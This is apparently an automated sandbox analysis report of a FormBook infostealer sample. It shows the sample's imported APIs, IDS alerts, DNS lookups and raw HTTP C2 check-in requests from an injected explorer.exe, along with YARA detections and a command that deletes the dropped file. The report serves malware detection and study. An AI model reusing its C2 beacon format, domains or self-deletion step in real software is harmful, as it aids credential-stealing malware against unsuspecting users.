KERNEL32.dll | CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
USER32.dll | ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/08/21-11:06:58.048885 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49724 | 80 | 192.168.2.3 | 23.227.38.74
04/08/21-11:06:58.048885 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49724 | 80 | 192.168.2.3 | 23.227.38.74
04/08/21-11:06:58.048885 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49724 | 80 | 192.168.2.3 | 23.227.38.74
04/08/21-11:06:58.188266 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49724 | 23.227.38.74 | 192.168.2.3

                                                                  Network Port Distribution

                                                                  TCP Packets


                                                                  UDP Packets


                                                                  DNS Queries

                                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                  Apr 8, 2021 11:06:47.333250046 CEST | 192.168.2.3 | 8.8.8.8 | 0x7449 | Standard query (0) | www.rainbowsdepot.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:06:52.563858986 CEST | 192.168.2.3 | 8.8.8.8 | 0xc92b | Standard query (0) | www.mywinnersworld.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.004676104 CEST | 192.168.2.3 | 8.8.8.8 | 0x2eb4 | Standard query (0) | www.gracieleesgiftsandmore.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:03.231091022 CEST | 192.168.2.3 | 8.8.8.8 | 0xca4a | Standard query (0) | www.ezmodafinil.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:13.456182003 CEST | 192.168.2.3 | 8.8.8.8 | 0x5abe | Standard query (0) | www.orgoneartist.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:18.552443981 CEST | 192.168.2.3 | 8.8.8.8 | 0x3dce | Standard query (0) | www.tonton-koubou.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:24.441622972 CEST | 192.168.2.3 | 8.8.8.8 | 0x76db | Standard query (0) | www.hatikuturkila.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:29.488107920 CEST | 192.168.2.3 | 8.8.8.8 | 0x3e06 | Standard query (0) | www.th0rgramm.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:34.569546938 CEST | 192.168.2.3 | 8.8.8.8 | 0xe4dc | Standard query (0) | www.phillhutt.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:40.396531105 CEST | 192.168.2.3 | 8.8.8.8 | 0x10f9 | Standard query (0) | www.formula-kuhni.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:03.825078964 CEST | 192.168.2.3 | 8.8.8.8 | 0x755d | Standard query (0) | www.formula-kuhni.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.507342100 CEST | 192.168.2.3 | 8.8.8.8 | 0x5434 | Standard query (0) | www.thelitigatorsbookclub.com | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.941447973 CEST | 192.168.2.3 | 8.8.8.8 | 0x80 | Standard query (0) | www.apettelp.club | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.192883968 CEST | 192.168.2.3 | 8.8.8.8 | 0xf08c | Standard query (0) | www.jjwheelerphotography.com | A (IP address) | IN (0x0001)

                                                                  DNS Answers

                                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                  Apr 8, 2021 11:06:47.551381111 CEST | 8.8.8.8 | 192.168.2.3 | 0x7449 | Server failure (2) | www.rainbowsdepot.com | none | none | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:06:52.765392065 CEST | 8.8.8.8 | 192.168.2.3 | 0xc92b | No error (0) | www.mywinnersworld.com | | 67.205.188.68 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.033833981 CEST | 8.8.8.8 | 192.168.2.3 | 0x2eb4 | No error (0) | www.gracieleesgiftsandmore.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001)
                                                                  Apr 8, 2021 11:06:58.033833981 CEST | 8.8.8.8 | 192.168.2.3 | 0x2eb4 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:03.430695057 CEST | 8.8.8.8 | 192.168.2.3 | 0xca4a | Server failure (2) | www.ezmodafinil.com | none | none | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:13.498326063 CEST | 8.8.8.8 | 192.168.2.3 | 0x5abe | Name error (3) | www.orgoneartist.com | none | none | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:18.801412106 CEST | 8.8.8.8 | 192.168.2.3 | 0x3dce | No error (0) | www.tonton-koubou.com | | 163.44.185.226 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:24.470289946 CEST | 8.8.8.8 | 192.168.2.3 | 0x76db | Name error (3) | www.hatikuturkila.com | none | none | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:29.514267921 CEST | 8.8.8.8 | 192.168.2.3 | 0x3e06 | Name error (3) | www.th0rgramm.com | none | none | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:34.848860025 CEST | 8.8.8.8 | 192.168.2.3 | 0xe4dc | No error (0) | www.phillhutt.com | | 103.97.19.74 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:07:40.471549034 CEST | 8.8.8.8 | 192.168.2.3 | 0x10f9 | No error (0) | www.formula-kuhni.com | | 91.236.136.12 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:04.001548052 CEST | 8.8.8.8 | 192.168.2.3 | 0x755d | No error (0) | www.formula-kuhni.com | | 91.236.136.12 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.543065071 CEST | 8.8.8.8 | 192.168.2.3 | 0x5434 | No error (0) | www.thelitigatorsbookclub.com | thelitigatorsbookclub.com | | CNAME (Canonical name) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:06.543065071 CEST | 8.8.8.8 | 192.168.2.3 | 0x5434 | No error (0) | thelitigatorsbookclub.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.968172073 CEST | 8.8.8.8 | 192.168.2.3 | 0x80 | No error (0) | www.apettelp.club | apettelp.club | | CNAME (Canonical name) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:11.968172073 CEST | 8.8.8.8 | 192.168.2.3 | 0x80 | No error (0) | apettelp.club | | 95.215.210.10 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST | 8.8.8.8 | 192.168.2.3 | 0xf08c | No error (0) | www.jjwheelerphotography.com | jjwheelerphotography.com | | CNAME (Canonical name) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST | 8.8.8.8 | 192.168.2.3 | 0xf08c | No error (0) | jjwheelerphotography.com | | 192.0.78.24 | A (IP address) | IN (0x0001)
                                                                  Apr 8, 2021 11:08:17.215616941 CEST | 8.8.8.8 | 192.168.2.3 | 0xf08c | No error (0) | jjwheelerphotography.com | | 192.0.78.25 | A (IP address) | IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • www.mywinnersworld.com
                                                                  • www.gracieleesgiftsandmore.com
                                                                  • www.tonton-koubou.com
                                                                  • www.phillhutt.com

                                                                  HTTP Packets

                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  0 | 192.168.2.3 | 49723 | 67.205.188.68 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp: Apr 8, 2021 11:06:52.880374908 CEST | kBytes transferred: 1174 | Direction: OUT
                                                                  GET /hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.mywinnersworld.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp: Apr 8, 2021 11:06:52.985718966 CEST | kBytes transferred: 1175 | Direction: IN
                                                                  HTTP/1.1 301 Moved Permanently
                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                  Date: Thu, 08 Apr 2021 09:06:52 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 194
                                                                  Connection: close
                                                                  Location: https://www.mywinnersworld.com/hx3a/?tZUT=0fll8pJq7ZAUibPF4kinhno6RtSSoQWPS25LacVc9zIksnHvjqyKkUnVN9tOTAaZP4N+&9r98J=FbY8OBD
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                  1 | 192.168.2.3 | 49724 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
                                                                  Timestamp: Apr 8, 2021 11:06:58.048885107 CEST | kBytes transferred: 1176 | Direction: OUT
                                                                  GET /hx3a/?tZUT=3J4IwxDxyQGM57lngVTovpY0RYYybvKdXCCorOYcpgj/2IXBVenraHtymYKqlnAzAiYz&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.gracieleesgiftsandmore.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp: Apr 8, 2021 11:06:58.188266039 CEST | kBytes transferred: 1177 | Direction: IN
                                                                  HTTP/1.1 403 Forbidden
                                                                  Date: Thu, 08 Apr 2021 09:06:58 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  X-Sorting-Hat-PodId: 154
                                                                  X-Sorting-Hat-ShopId: 44749029531
                                                                  X-Dc: gcp-us-east1
                                                                  X-Request-ID: 2df77edf-6e63-4f5a-9d73-69255bdc7913
                                                                  Set-Cookie: _shopify_fs=2021-04-08T09%3A06%3A58Z; Expires=Fri, 08-Apr-22 09:06:58 GMT; Domain=gracieleesgiftsandmore.com; Path=/; SameSite=Lax
                                                                  X-Content-Type-Options: nosniff
                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                  X-XSS-Protection: 1; mode=block
                                                                  X-Download-Options: noopen
                                                                  CF-Cache-Status: DYNAMIC
                                                                  cf-request-id: 095255278a0000233d520e6000000001
                                                                  Server: cloudflare
                                                                  CF-RAY: 63ca57b8dc76233d-ZRH
                                                                  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                  Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9


                                                                  Session ID:2
                                                                  Source IP:192.168.2.3
                                                                  Source Port:49727
                                                                  Destination IP:163.44.185.226
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Apr 8, 2021 11:07:19.043236971 CEST
                                                                  kBytes transferred:1221
                                                                  Direction:OUT
                                                                  Data:GET /hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.tonton-koubou.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Apr 8, 2021 11:07:19.424396992 CEST
                                                                  kBytes transferred:1222
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 301 Moved Permanently
                                                                  Date: Thu, 08 Apr 2021 09:07:19 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: close
                                                                  Server: Apache
                                                                  X-Powered-By: PHP/7.4.12
                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                  X-Redirect-By: WordPress
                                                                  Location: http://tonton-koubou.com/hx3a/?tZUT=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpTR01i4U7VcQ&9r98J=FbY8OBD
                                                                  X-Cache: MISS


                                                                  Session ID:3
                                                                  Source IP:192.168.2.3
                                                                  Source Port:49735
                                                                  Destination IP:103.97.19.74
                                                                  Destination Port:80
                                                                  Process:C:\Windows\explorer.exe
                                                                  Timestamp:Apr 8, 2021 11:07:35.113116980 CEST
                                                                  kBytes transferred:4899
                                                                  Direction:OUT
                                                                  Data:GET /hx3a/?tZUT=etiEYBoPDxOhXHdNW+toGoO48BEbVYBhZG7o21xT+1ckFZjGUMv71muAk6m7YJWGV3TF&9r98J=FbY8OBD HTTP/1.1
                                                                  Host: www.phillhutt.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Timestamp:Apr 8, 2021 11:07:35.378310919 CEST
                                                                  kBytes transferred:4899
                                                                  Direction:IN
                                                                  Data:HTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Thu, 08 Apr 2021 09:07:34 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 1.0


                                                                  Code Manipulations

                                                                  Statistics

                                                                  Behavior

                                                                  System Behavior

                                                                  General

                                                                  Start time:11:06:00
                                                                  Start date:08/04/2021
                                                                  Path:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x400000
                                                                  File size:371388 bytes
                                                                  MD5 hash:5D8702803555FF684424EBD13EDA9F47
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.216654991.000000001EEF0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:11:06:01
                                                                  Start date:08/04/2021
                                                                  Path:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x400000
                                                                  File size:371388 bytes
                                                                  MD5 hash:5D8702803555FF684424EBD13EDA9F47
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256189783.0000000000A00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.210481681.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.255958752.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.256046021.00000000005E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:low

                                                                  General

                                                                  Start time:11:06:07
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\explorer.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:
                                                                  Imagebase:0x7ff714890000
                                                                  File size:3933184 bytes
                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:11:06:22
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\SysWOW64\explorer.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                  Imagebase:0x8c0000
                                                                  File size:3611360 bytes
                                                                  MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.467033203.00000000004E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.468337581.0000000000840000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.468235656.0000000000810000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                  Reputation:high

                                                                  General

                                                                  Start time:11:06:26
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:/c del 'C:\Users\user\Desktop\AQJEKNHnWK.exe'
                                                                  Imagebase:0x11c0000
                                                                  File size:232960 bytes
                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:11:06:27
                                                                  Start date:08/04/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6b2800000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  Disassembly

                                                                  Code Analysis
